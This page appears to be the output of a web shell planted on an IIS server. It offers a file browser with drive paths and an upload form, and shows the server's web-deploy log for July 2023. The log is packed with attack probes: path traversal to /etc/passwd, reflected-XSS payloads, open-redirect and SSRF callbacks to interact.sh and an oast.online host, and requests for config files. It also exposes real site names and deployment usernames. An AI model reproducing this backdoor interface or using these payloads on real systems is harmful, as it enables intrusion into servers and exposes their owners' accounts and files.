????<!DOCTYPE HTML>

<HTML>

<HEAD>

<title></title>

<style>

body{

font-family: monospace;

font-weight: bold;

font-size: 18px;

background-color: #c5c5c5;

color: #000;

}

#content tr:hover{

background-color: #ccc;

}

#content .first{

background-color: #ccc;

}

#content .first:hover{

background-color: #ccc;

}

table{

border: 3px #000 solid;

}

a{

color: #000;

text-decoration: none;

}

a:hover{

color: #00f;

}

input,select,textarea{

border: 1px #000 solid;

-moz-border-radius: 5px;

-webkit-border-radius:5px;

border-radius:5px;

}

input {

 font-size: 18px;

 font-weight: bold;

 padding: 5px;

}

select {

font-size: 19px

}

textarea {

font-size: 10px

}

td, tr { padding: 2px 5px; }



</style>

</HEAD>

<BODY>

<hr width="920" color="black"/>

<hr width="920" color="black"/><center><p><h2>Your IP : 18.188.195.92</h2></p></center>

<hr width="920" color="black"/>

<table width="920" border="1px" cellpadding="7" cellspacing="0" align="center">

<tr><td style="padding: 8px">Current Path : <a href="?path=C:">C:</a>/<a href="?path=C:/inetpub">inetpub</a>/<a href="?path=C:/inetpub/logs">logs</a>/<a href="?path=C:/inetpub/logs/wmsvc">wmsvc</a>/<a href="?path=C:/inetpub/logs/wmsvc/W3SVC1">W3SVC1</a>/</td></tr><tr><td><form enctype="multipart/form-data" method="POST">

Upload File : <input type="file" name="file" />

<input type="submit" value="Upload" />

</form>

</td></tr><tr><td style='padding: 8px'>Current File : C:/inetpub/logs/wmsvc/W3SVC1/ex230706.log</tr></td></table><br /><pre>#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-07-06 00:11:31
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-07-06 00:11:31 103.153.214.94 GET / - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 25
2023-07-06 00:17:25 103.153.214.94 GET /assets/php/filebrowser/filebrowser.main.php do=download&amp;file=../../../../../../../../../../etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 30
2023-07-06 00:18:29 103.153.214.94 GET /find_v2/_click _t_hit.id&amp;_t_id&amp;_t_q&amp;_t_redirect=https://interact.sh 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 25
2023-07-06 00:18:55 103.153.214.94 POST /wp-admin/admin.php - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 30
2023-07-06 00:20:22 103.153.214.94 GET /boafrm/formWlanRedirect redirect-url=http://interact.sh&amp;wlan_id=1 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 34
2023-07-06 00:25:02 103.153.214.94 POST /api/add-article-by-text - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 25
2023-07-06 00:25:22 103.153.214.94 GET /libs/granite/offloading/content/view.html - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 27
2023-07-06 00:28:49 103.153.214.94 GET /hosts - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 27
2023-07-06 00:35:56 103.153.214.94 GET /wfo/control/signin rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 33
2023-07-06 00:40:09 103.153.214.94 GET /wp-content/uploads/wp-security-audit-log/failed-logins/ - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 26
2023-07-06 00:47:42 103.153.214.94 GET /wp-json/wp/v2/posts per_page=1 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 26
2023-07-06 00:51:58 103.153.214.94 GET /mod/lti/auth.php redirect_uri=javascript:alert(&#039;2S8fNeB4J8aRAesZlV44cW6JvPi&#039;) 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 25
2023-07-06 00:58:23 103.153.214.94 GET /index.php controller=../../../../../../../../../../etc/passwd%00&amp;option=com_ccnewsletter 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 27
2023-07-06 01:01:38 103.153.214.94 GET /s/2S8fNm8dEwHRCihbLrUjuKRYxBC/_/;/WEB-INF/web.xml - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 28
2023-07-06 01:02:16 103.153.214.94 GET / - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 32
2023-07-06 01:08:47 103.153.214.94 GET /.circleci/config.yml - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 29
2023-07-06 01:18:55 103.153.214.94 PUT /v1/kv/2S8fNvThVGncRKLJCXEgxheq2GA - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 31
2023-07-06 01:18:55 103.153.214.94 GET /v1/kv/2S8fNvThVGncRKLJCXEgxheq2GA raw 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 29
2023-07-06 01:32:40 103.153.214.94 GET /NON_EXISTING_PATH/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 28
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-07-06 02:03:06
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-07-06 02:03:06 103.153.214.94 GET /js/routing callback=fos.Router.setDatafoobarfoo 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 30
2023-07-06 02:03:38 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 - 171.231.125.223 - - 401 2 5 57
2023-07-06 02:03:38 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.125.223 - - 200 0 0 74
2023-07-06 02:03:38 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.125.223 - - 200 0 0 70
2023-07-06 02:03:40 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.125.223 VSCmdLine:WTE6.0.6.36821;sid=a4d9bc30-8f56-48d4-b7d4-1600e2afba6f;op=Sync - 200 0 0 228
2023-07-06 02:03:40 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.125.223 - - 200 0 0 1859
2023-07-06 02:03:40 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.125.223 - - 200 0 0 28
2023-07-06 02:03:40 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.125.223 - - 200 0 0 397
2023-07-06 02:03:40 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.125.223 VSCmdLine:WTE6.0.6.36821;sid=a4d9bc30-8f56-48d4-b7d4-1600e2afba6f;op=Sync - 200 0 0 300
2023-07-06 02:07:38 103.153.214.94 POST /client - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 24
2023-07-06 02:09:51 103.153.214.94 GET /website/lang/en_US r=https://interact.sh/ 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 28
2023-07-06 02:13:00 103.153.214.94 GET /wp-content/plugins/new-year-firework/firework/index.php text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 31
2023-07-06 02:14:15 103.153.214.94 GET /rest/api/2/user/picker query 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 24
2023-07-06 02:16:06 103.153.214.94 GET /wp-content/plugins/flexible-custom-post-type/edit-post.php id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 34
2023-07-06 02:19:56 103.153.214.94 GET /a/b/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 400 0 0 32
2023-07-06 02:22:20 103.153.214.94 POST /admin/index.php id=pages 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 26
2023-07-06 02:26:39 103.153.214.94 GET /.svn/entries - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 26
2023-07-06 02:32:41 103.153.214.94 GET /&lt;script&gt;alert(document.domain)&lt;/script&gt; - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 400 0 0 34
2023-07-06 02:35:43 103.153.214.94 GET / s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 24
2023-07-06 02:40:39 103.153.214.94 GET /squid.svg background=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cimg%20src=%22&amp;small&amp;text=This%20is%20not%20the%20page%20you%20are%20looking%20for!&amp;title=Not%20Found 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 26
2023-07-06 02:44:00 103.153.214.94 POST /wp-login.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 27
2023-07-06 02:44:00 103.153.214.94 GET /wp-admin/admin.php page=nsp_search&amp;what1=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 23
2023-07-06 02:47:36 103.153.214.94 GET /tcpconfig.html - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 34
2023-07-06 02:52:14 103.153.214.94 POST /rails/actions action=Run%20pending%20migrations&amp;error=ActiveRecord::PendingMigrationError&amp;location=%0djavascript:alert(1)//%0aaaaaa 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 27
2023-07-06 02:55:42 103.153.214.94 GET /remote/login err=--%3E%3Cscript%3Ealert(&#039;2S8fNhKHmYcREmQnmFE6E9liGDl&#039;)%3C/script%3E%3C!--&amp;lang=en 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 29
2023-07-06 03:08:23 103.153.214.94 GET /ie50/system/login/SysLoginUser.aspx Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&amp;Login=Error 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 33
2023-07-06 03:08:23 103.153.214.94 GET /system/login/SysLoginUser.aspx Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&amp;Login=Error 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 28
2023-07-06 03:12:12 103.153.214.94 GET /elmah - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 28
2023-07-06 03:12:12 103.153.214.94 GET /elmah.axd - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 25
2023-07-06 03:15:36 103.153.214.94 GET /plugins/weathermap/editor.php action=set_map_properties&amp;debug=existing&amp;link_bandwidth_in&amp;link_bandwidth_out&amp;link_hover&amp;link_infourl&amp;link_name&amp;link_target&amp;link_width&amp;map_legend=Traffic+Load&amp;map_linkdefaultwidth=7&amp;map_stamp=Created:+%b+%d+%Y+%H:%M:%S&amp;map_title=46ea1712d4b13b55b3f680cc5b8b54e8&amp;mapname=poc.conf&amp;node_hover&amp;node_iconfilename=--NONE--&amp;node_infourl&amp;node_label&amp;node_name&amp;node_new_name&amp;node_x&amp;node_y&amp;param&amp;param2&amp;plug=0 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 30
2023-07-06 03:15:36 103.153.214.94 GET /plugins/weathermap/configs/poc.conf - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 23
2023-07-06 03:22:03 103.153.214.94 GET / %3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&amp;page_id=2 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 37
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-07-06 03:41:15
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-07-06 03:41:15 103.153.214.94 GET /etc/passwd - 8172 - 45.117.82.231 - - 404 7 0 28
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-07-06 03:57:02
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-07-06 03:57:02 103.153.214.94 GET / - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 25
2023-07-06 03:57:18 103.153.214.94 HEAD /msdeploy.axd Site=xaydung.gdtsolutions.vn 8172 - 119.82.130.75 - - 401 2 5 10
2023-07-06 03:57:18 103.153.214.94 HEAD /msdeploy.axd Site=xaydung.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 78
2023-07-06 03:57:18 103.153.214.94 HEAD /msdeploy.axd Site=xaydung.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 18
2023-07-06 03:57:18 103.153.214.94 POST /msdeploy.axd Site=xaydung.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 757
2023-07-06 03:57:18 103.153.214.94 POST /msdeploy.axd Site=xaydung.gdtsolutions.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=d44a9cfe-9857-483e-87f7-e7853181dffc;op=Sync - 200 0 0 687
2023-07-06 03:57:18 103.153.214.94 HEAD /msdeploy.axd Site=xaydung.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 12
2023-07-06 03:57:59 103.153.214.94 POST /msdeploy.axd Site=xaydung.gdtsolutions.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=d44a9cfe-9857-483e-87f7-e7853181dffc;op=Sync - 200 0 0 39563
2023-07-06 03:57:59 103.153.214.94 POST /msdeploy.axd Site=xaydung.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 39600
2023-07-06 04:05:30 103.153.214.94 GET /wp-content/themes/eatery/nav.php -Menu-=https://interact.sh/ 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 32
2023-07-06 04:06:45 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.125.223 - - 200 0 0 37
2023-07-06 04:06:45 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.125.223 - - 200 0 0 60
2023-07-06 04:06:45 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.125.223 VSCmdLine:WTE6.0.6.36821;sid=6b28f966-ea02-4486-a8e7-e218d7fa5dc0;op=Sync - 200 0 0 232
2023-07-06 04:06:45 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.125.223 - - 200 0 0 741
2023-07-06 04:06:45 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.125.223 - - 200 0 0 25
2023-07-06 04:06:50 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.125.223 VSCmdLine:WTE6.0.6.36821;sid=6b28f966-ea02-4486-a8e7-e218d7fa5dc0;op=Sync - 200 0 0 4288
2023-07-06 04:06:50 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.125.223 - - 200 0 0 4378
2023-07-06 04:11:51 103.153.214.94 POST /fcgi-bin/wgsetcgi - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 33
2023-07-06 04:14:20 103.153.214.94 GET /interact.sh/%2e%2e%2f - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 400 0 0 27
2023-07-06 04:16:23 103.153.214.94 POST / - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 26
2023-07-06 04:18:43 103.153.214.94 GET / mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E&amp;mapp_iframe=1 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 24
2023-07-06 04:24:36 103.153.214.94 GET /ics query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&amp;tool=search 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 35
2023-07-06 04:25:33 103.153.214.94 POST /install.php page=4 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 25
2023-07-06 04:25:50 103.153.214.94 GET /behat.yml - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 26
2023-07-06 04:25:50 103.153.214.94 GET /behat.yml.dist - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 23
2023-07-06 04:28:33 103.153.214.94 HEAD /msdeploy.axd Site=bcvt.kontum.gov.vn 8172 - 119.82.130.75 - - 401 2 5 13
2023-07-06 04:28:33 103.153.214.94 HEAD /msdeploy.axd Site=bcvt.kontum.gov.vn 8172 jenkins 119.82.130.75 - - 200 0 0 21
2023-07-06 04:28:33 103.153.214.94 HEAD /msdeploy.axd Site=bcvt.kontum.gov.vn 8172 jenkins 119.82.130.75 - - 200 0 0 19
2023-07-06 04:28:36 103.153.214.94 POST /msdeploy.axd Site=bcvt.kontum.gov.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=aa439676-dc9e-4cb8-b9b9-3e9379f1edea;op=Sync - 200 0 0 2983
2023-07-06 04:28:36 103.153.214.94 POST /msdeploy.axd Site=bcvt.kontum.gov.vn 8172 jenkins 119.82.130.75 - - 200 0 0 3046
2023-07-06 04:28:36 103.153.214.94 HEAD /msdeploy.axd Site=bcvt.kontum.gov.vn 8172 jenkins 119.82.130.75 - - 200 0 0 7
2023-07-06 04:30:46 103.153.214.94 POST /msdeploy.axd Site=bcvt.kontum.gov.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=aa439676-dc9e-4cb8-b9b9-3e9379f1edea;op=Sync - 200 0 0 130168
2023-07-06 04:30:46 103.153.214.94 POST /msdeploy.axd Site=bcvt.kontum.gov.vn 8172 jenkins 119.82.130.75 - - 200 0 0 130201
2023-07-06 04:31:36 103.153.214.94 GET /ueditor/php/controller.php action=catchimage&amp;source[]=http://127.0.0.1:013122/?1.png 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 26
2023-07-06 04:31:36 103.153.214.94 GET /ueditor/jsp/controller.jsp action=catchimage&amp;source[]=http://127.0.0.1:450469/?1.png 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 25
2023-07-06 04:35:08 103.153.214.94 GET /wp-login.php redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 28
2023-07-06 04:37:11 103.153.214.94 GET /rewe/prod/web/rewe_go_check.php config=rewe&amp;version=7.5.0%3cscript%3econfirm(2S8fNycPjjozEmj1szX305fLFD6)%3c%2fscript%3e&amp;win=2707 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 30
2023-07-06 04:38:00 103.153.214.94 GET /ui/vropspluginui/rest/services/getvcdetails - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 29
2023-07-06 04:42:42 103.153.214.94 GET /users/registration - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 27
2023-07-06 04:48:34 103.153.214.94 POST /ui/login - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 27
2023-07-06 04:51:07 103.153.214.94 GET /wp-content/plugins/tidio-gallery/popup-insert-help.php galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 32
2023-07-06 04:57:28 103.153.214.94 GET /backend/admin/common/clearcache previousUrl=http://www.interact.sh 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 33
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-07-06 05:15:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-07-06 05:14:59 103.153.214.94 GET /new/newhttp:/interact.sh - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 400 0 0 33
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-07-06 05:57:20
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-07-06 05:57:20 103.153.214.94 GET /rest/sharelinks/1.0/link url=https://ciio7miofm2mtabc1uagofww3fzwq6g1m.oast.online/ 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 30
